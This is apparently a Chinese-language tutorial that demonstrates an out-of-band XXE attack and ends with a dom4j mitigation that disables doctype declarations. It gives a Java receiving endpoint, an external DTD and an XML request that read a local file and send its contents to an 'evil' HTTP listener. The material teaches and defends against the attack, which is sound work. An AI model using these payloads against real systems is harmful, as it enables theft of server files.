xml,允许我们存储和传输数据。也提供了DTD,允许我们进行文档类型定义,外部DTD,定义的实体可以窃取服务器信息,上传至指定的服务器上。
接下来,就模拟一下:xxe,窃取信息服务器信息,上传至指定服务器。
1.编写接收接口:
@RequestMapping("evil/{content}")
@ResponseBody
public void evil(@PathVariable String content,HttpServletResponse response) {
LOGGER.info("content:"+content);
ResponseUtil.writeHtml(response, content);
}
2.编写外部dtd:
<!ENTITY % shell "<!ENTITY upload SYSTEM 'http://127.0.0.1:8096/evil/%file;'>"> %shell;
3.编写xml请求数据:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///Users/my_mac/Desktop/txt"> <!ENTITY % xxe SYSTEM "http://127.0.0.1:8096/xxe.dtd"> %xxe; ]> <value>&upload;</value>
以上就是模拟了,xml数据,获取我桌面txt文件内容,上传至http://127.0.0.1:8096/evil,接口的示例。
微信支付回调函数使用的就是xml传输数据。今年就暴漏出了,xxe攻击的风险。目前已经修复。阻止xxe攻击,一般只要禁止外部实体的使用就可以了。
举一例:
org.dom4j.io.SAXReader
SAXReader reader = new SAXReader();
reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true); //设置禁止使用doctype声明,就可以阻止此类攻击